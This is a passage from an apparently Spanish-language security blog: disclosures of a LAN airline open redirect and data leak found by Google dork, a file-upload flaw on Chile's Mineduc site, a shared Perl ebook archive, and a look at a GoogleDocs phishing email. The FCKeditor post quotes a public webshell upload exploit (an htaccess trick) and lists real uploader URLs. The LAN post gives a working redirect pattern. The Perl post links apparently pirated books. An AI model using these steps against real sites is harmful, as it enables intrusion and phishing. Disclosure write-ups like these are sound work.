<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb81uFXCtoB553UX0N04mKzR5l3ldHFVi2qWnkdqQmWbsZdqC929aONBiGGa6Cdl003ByDC2vk_wa4uZL5tt1iioMyTQCrrdQHHTAP_W6Kzrau-mRxucNMRsqEtCne-s6fuqtE_TCFsK-I/s1600/lan1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb81uFXCtoB553UX0N04mKzR5l3ldHFVi2qWnkdqQmWbsZdqC929aONBiGGa6Cdl003ByDC2vk_wa4uZL5tt1iioMyTQCrrdQHHTAP_W6Kzrau-mRxucNMRsqEtCne-s6fuqtE_TCFsK-I/s1600/lan1.png" height="232" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">2) Como se trata de un correo de publicidad o de estados de cuenta por parte de LAN, nos ofrece realizar un "unsuscribe"(cancelar la suscripción) para dejar de recibir los correos por parte de ellos donde la URL muestra nuestro correo y nos lleva a la confirmación para la cancelación.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxuLSg-rAene3KEFhstnFwJOmIdinRihakQlvkVvyOAGPTPp4BHiA934PvDgeCyuSknEd7IJFBe700xIPLmNkEix3wQhNfqoE_7snBGJqa8OGs4pt_NcQZ-8ph3eRHsDwucJuwhj20mXzl/s1600/lan2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxuLSg-rAene3KEFhstnFwJOmIdinRihakQlvkVvyOAGPTPp4BHiA934PvDgeCyuSknEd7IJFBe700xIPLmNkEix3wQhNfqoE_7snBGJqa8OGs4pt_NcQZ-8ph3eRHsDwucJuwhj20mXzl/s1600/lan2.png" height="208" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Dejando en claro esto es que comienzan los experimentos:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">1) <b>¿Podremos cancelar la suscripción de otras personas arbitrariamente?</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Lamentablemente, para cancelar la suscripción en la URL cada correo tiene su propio parámetro "<b>CHECK"</b> , unas cuantas combinaciones de letras y números generados para cada correo con el cual evitan que podamos utilizarlo para cancelar la suscripción de otros, ya que tendríamos que conocer su <b>CHECK </b>individual.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">2) <b>¿El Open Url Redirection es tan "Open" como pensamos?</b> - Una buena respuesta es NO y SI: NO: porque despues de http://news.lan.com/?XXXXXXXXXXXX viene un codigo generado por LAN que le da validez a la redirección pero sin <b>limitar</b> el destino de esta redirección: en otras palabras podemos ocupar ese codigo valido para redirgir donde nosotros queramos, las veces que queramos.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">¿y que hacemos? - Si para cancelar la suscripción existe un check propio y relacionado con un correo único y por otro lado necesitamos el otro código valido para generar la redirección.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Pues <b>GOOGLE</b> no?<br /><br /><b>Dork? </b>pueden imaginarlo: <b>site:http://news.lan.com</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>182 resultados.</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfcZ5sndxm1Z0SWIGmSXbiv8fS1Vd4mjRaRKrsc7sAYJzZ50w62F7idcnvtie_iG0AOZ6tdvYUxeV1wes-YDtN7JVryKwvS8uTmO8_Aj7eIdA2xvp_RmncNTENkzT3iSk5lf9SFCtg5NWA/s1600/lan3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfcZ5sndxm1Z0SWIGmSXbiv8fS1Vd4mjRaRKrsc7sAYJzZ50w62F7idcnvtie_iG0AOZ6tdvYUxeV1wes-YDtN7JVryKwvS8uTmO8_Aj7eIdA2xvp_RmncNTENkzT3iSk5lf9SFCtg5NWA/s1600/lan3.png" height="416" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Cada resultado o al menos la mayoría contiene los mismos datos que los correos que recibí: Antes se seguir Aquí viene la parte del <b>DATALEAK:</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Correos son enviados con: <b>Nombre Apellido Nºde Socio Kms LanPass Fecha de Vencimiento y gracias a que tenemos en todos la opción de "cancelar suscripción" Podemos obtener el Correo Electronico.</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Ejemplo :</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNTg7ATqogGGXHZQ9nGqfKQnefZMDwYjE9Svqr7TQtyeeOfXEFH7Q75D8hB6Pdd3fZa_PU710XaCm2KFtd9Y5pvoYxJUN9XxRO7S1Tu29fzD9ThiXX3hGA8J8opSjlYZ5nfsNwUUFrb0U/s1600/lan4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNTg7ATqogGGXHZQ9nGqfKQnefZMDwYjE9Svqr7TQtyeeOfXEFH7Q75D8hB6Pdd3fZa_PU710XaCm2KFtd9Y5pvoYxJUN9XxRO7S1Tu29fzD9ThiXX3hGA8J8opSjlYZ5nfsNwUUFrb0U/s1600/lan4.png" height="296" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>Gracias a GOOGLE obtenemos:</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>* Correo + check valido, pudiendo cancelar la suscripción de aquellos correos indexados por el buscados que son alrededor de 182 resultados .</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">*<b>Además obtenemos códigos validos para realizar el Open Url Redirection por ejemplo</b>:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpmlNKrjMCWU7XNRxO-GXrxW73VkYx-Q8QKkBOqZEz_cmZR0EavcgN7s44mUu4o7iYy719RTsdUumTPr6AVAh73hRWcnxUJZdIIV-FmOLrhXWCZwPT49R1zM4KK182yZ2jMV2GhAZ383D/s1600/lan5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLpmlNKrjMCWU7XNRxO-GXrxW73VkYx-Q8QKkBOqZEz_cmZR0EavcgN7s44mUu4o7iYy719RTsdUumTPr6AVAh73hRWcnxUJZdIIV-FmOLrhXWCZwPT49R1zM4KK182yZ2jMV2GhAZ383D/s1600/lan5.png" height="15" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Donde al reemplazar el sitio que viene después de '&' podemos realizar finalmente la redirección arbitraria como muestra este ejemplo hacia Google: </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://news.lan.com/?YEmp.2v3Z**********&http://google.cl</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><b><u>Alcance:</u></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Con esta información, podriamos generar perfectamente un ataque de phishing personalizado. Además de tomar en cuenta que ya un DataLeak por si solo es un problema a la privacidad.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><u><b>Estado:</b></u></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Me comunique con el encargado de seguridad de LAN y me comunicaron que estaban al tanto de lo que sucedía y habían levantado el tema hacia el área encargada hace bastante tiempo.<br /><br /><b>TimeLapse?</b><br />7 Noviembre: Comunique el Problema</span><br />
<span style="font-family: Courier New, Courier, monospace;">17 Noviembre: Solución a los Resultados de la Búsqueda en Google.</span><br />
<span style="font-family: Courier New, Courier, monospace;">22 Noviembre: Publicación.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><i>Excelente y rápida respuesta del Encargado de Seguridad de LAN, muy amable, atento a los reportes, y a responder cada correo.</i></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">*/ FIN</span></div>
<div>
<br /></div>
shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-37978832568063415612014-11-12T16:47:00.001-08:002014-11-12T16:58:19.709-08:00Mineduc & Fckeditor: Arbitrary File Upload Vulnerability<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl3p8iyOamTf4O6G6E-rs41jRwgGxeFLQb05p5E6PY6EvFXd-_dOs9Z4kpX8FLhV38sESAZ5MDaj34dsJVL-aImDx6-vufbo6lhjvVinHHIppZaLZLSHezCAp3ogqK7jlDzqJY-jCltGDK/s1600/mineduc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl3p8iyOamTf4O6G6E-rs41jRwgGxeFLQb05p5E6PY6EvFXd-_dOs9Z4kpX8FLhV38sESAZ5MDaj34dsJVL-aImDx6-vufbo6lhjvVinHHIppZaLZLSHezCAp3ogqK7jlDzqJY-jCltGDK/s200/mineduc.jpg" width="200" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;">La vulnerabilidad en Fckeditor [ Arbitrary File Upload Vulnerability] </span><span style="font-family: 'Courier New', Courier, monospace;">es bastante conocida y la forma de explotarla y lograr subir una Webshell también, es cosa de hacer una búsqueda en Google.Y vemos que aparecen multiples "exploits" como el que se muestra aquí:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: plain">1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</filesmatch>
2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server. </pre>
<br />
<span style="font-family: Courier New, Courier, monospace;">El sitio del Mineduc utiliza Fckeditor. / UPS</span><br />
<span style="font-family: Courier New, Courier, monospace;">Es relativamente fácil encontrar los directorios finales ya que son públicamente conocidos, así llegar a los uploaders.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><b>Mineduc?</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/upload/test.html</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/connectors/test.html</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/frmupload.html</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.mineduc.cl/aplicaciones/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixg9k1rPpwHwk74f3ERX8GmPdmSTOISfxNA1LgnVIZEw5Fc7wPXmr_OF1iT0U-5pil_6UwRn749Jr1mQATuXyB8j7O4kBXL5bw6OCu_p5SDjykRrs_DvplWtA5s2wlGQy8sgpRJ00e1JDs/s640/lolo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixg9k1rPpwHwk74f3ERX8GmPdmSTOISfxNA1LgnVIZEw5Fc7wPXmr_OF1iT0U-5pil_6UwRn749Jr1mQATuXyB8j7O4kBXL5bw6OCu_p5SDjykRrs_DvplWtA5s2wlGQy8sgpRJ00e1JDs/s640/lolo.png" height="227" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">---------------------------------------------------------------<br />Reportado // -> <u><span style="font-size: large;">ESTADO: </span></u></span><span style="font-family: Courier New, Courier, monospace; font-size: large;"><u><b>Fixed</b> </u></span><br />
<span style="font-family: Courier New, Courier, monospace;">FIN /..</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-78666285781213505002014-10-31T18:23:00.000-07:002014-10-31T18:27:55.398-07:00[Compartir] Libros de Perl - #!usr/bin/perl<span style="font-family: Courier New, Courier, monospace;">En esta ocasión vengo a compartir algunos texto sobre Perl, para que puedan leer sobre este lenguaje y los guarden en sus bibliotecas propias.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoUjJ9fMt_wA7dEh3H2kf82UmCXyelQlj1cVlS1dpd7VPPKeQFsWDaAM_dqIPFiwdvoI2xoVi3TFeLCAUmHXak7u8exF3WRfuiB1JoESe2m0uAm73g_H1sYoC72__X8XLFHVD03_NGACzf/s1600/shebang_perl_2for1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoUjJ9fMt_wA7dEh3H2kf82UmCXyelQlj1cVlS1dpd7VPPKeQFsWDaAM_dqIPFiwdvoI2xoVi3TFeLCAUmHXak7u8exF3WRfuiB1JoESe2m0uAm73g_H1sYoC72__X8XLFHVD03_NGACzf/s1600/shebang_perl_2for1.jpg" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly - Advanced Perl Programming</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly Learning Perl</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly Mastering Algorithms with Perl</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly - Perl - Perl For Sysadmins</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly - Perl and XML</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> O'Reilly Perl Cookbook</span><br />
<span style="font-family: Courier New, Courier, monospace;">-> </span><span style="font-family: 'Courier New', Courier, monospace;">O'Reilly </span><span style="font-family: 'Courier New', Courier, monospace;">Programming Perl - 4Th-Edition - Feb-2012</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace;"><a href="http://anonym.to/?http://freakshare.com/files/g2d3jhjg/perlbook.rar.html" target="_blank">Freakshare / Descarga</a> </span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace;">Pass: perlonbook</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-13340566390137766512014-07-22T18:20:00.000-07:002014-07-22T18:22:14.710-07:00Ataque dirigido simulando GoogleDocs - CHILE<span style="font-family: Courier New, Courier, monospace;">Una tarde como esta estaba tranquilo por la vida y derrepente mi novia me dice: ¿Hey, me llego esto y no sé si abrirlo? <i>[Han servido mis conversaciones de que no abra cualquier cosa y desconfie de todo eh? JAJAJAJA ]</i></span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Resulta que le llego desde un remitente conocido un singular correo que en el asunto dice lo siguiente:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>"documento Confidencial"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">En el cuerpo del mensaje: </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZR51qu9fJnE-gvWBRkf48njxu2o6xIdCzwDdMnIkAH-WfEhGbiUvnStbBTDcc5965F48dMI38jK5eoIHTuObF2u864dshy7nyE0GrJtbhNLCk9qiWVNSP3H2x_vME-AzPji2lcXCwVenR/s1600/fake1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZR51qu9fJnE-gvWBRkf48njxu2o6xIdCzwDdMnIkAH-WfEhGbiUvnStbBTDcc5965F48dMI38jK5eoIHTuObF2u864dshy7nyE0GrJtbhNLCk9qiWVNSP3H2x_vME-AzPji2lcXCwVenR/s1600/fake1.png" height="195" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Estableciendo el contexto, puede suceder y que alguien crea este correo por lo siguiente: ( y así sucedio o.O )</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">1) EL remitente es de un profesor, por lo cual existen razones creíbles por que debería consultar el documento.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">2) El usuario común muchas veces no se percata de la URL:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjC32AGgIuxY1tSkOAPFWQGqz1z2DH6GKbsFDFC1-9IAwXGsmAsWM37srMqpj29f-SOVQWKtNedX9arLC_k1IsLMPLQYrP4Kbv7NpPDngDYGM7ptiPx4Spl5az16-_vcTKbA9OUZOp2GM/s1600/fake2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRjC32AGgIuxY1tSkOAPFWQGqz1z2DH6GKbsFDFC1-9IAwXGsmAsWM37srMqpj29f-SOVQWKtNedX9arLC_k1IsLMPLQYrP4Kbv7NpPDngDYGM7ptiPx4Spl5az16-_vcTKbA9OUZOp2GM/s1600/fake2.png" height="284" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">OJO: Consultar el documento subido a googledocs simplemente INICIANDO SESIÓN CON TU EMAIL, expresando que es muy importante.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Dirigidos a : </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://www.mainecoastcottage.com/FileAuth/googledocs/index.html</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXFZjkzsw3HX9EQRF0PlaYL6J2SIxazL7xqsOFgCdQoXgFsWybn8yEXc1wQf5r3T5j0zfjvSI-qrvZt-BHEFQE6u16wRE4u0h6jrUvh0Bqi4sSJOO0fp-5HKgawOOVRS1f3H1c6XHETrdY/s1600/fake3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXFZjkzsw3HX9EQRF0PlaYL6J2SIxazL7xqsOFgCdQoXgFsWybn8yEXc1wQf5r3T5j0zfjvSI-qrvZt-BHEFQE6u16wRE4u0h6jrUvh0Bqi4sSJOO0fp-5HKgawOOVRS1f3H1c6XHETrdY/s1600/fake3.png" height="320" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Podemos iniciar sesión con yahoo! ; Gmail ; OUTLOOK 77 ; AOL etc.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Aquí lo que se despliega en cada situación:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRFykklOAgLa0-M1HMMiFlmQbvpaPW77QWPPY_APCJWVhlcWJkQNfhOQl3m3ySb2yBm7LAjKxCLUFDmHhN7HY3FWfeIFFFuDN1bri6Y3RxwD4edI5ShRDRb-f6aMJpkDw2NMGBm3m00CLF/s1600/f4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRFykklOAgLa0-M1HMMiFlmQbvpaPW77QWPPY_APCJWVhlcWJkQNfhOQl3m3ySb2yBm7LAjKxCLUFDmHhN7HY3FWfeIFFFuDN1bri6Y3RxwD4edI5ShRDRb-f6aMJpkDw2NMGBm3m00CLF/s1600/f4.png" height="188" width="640" /></a></div>
<div>
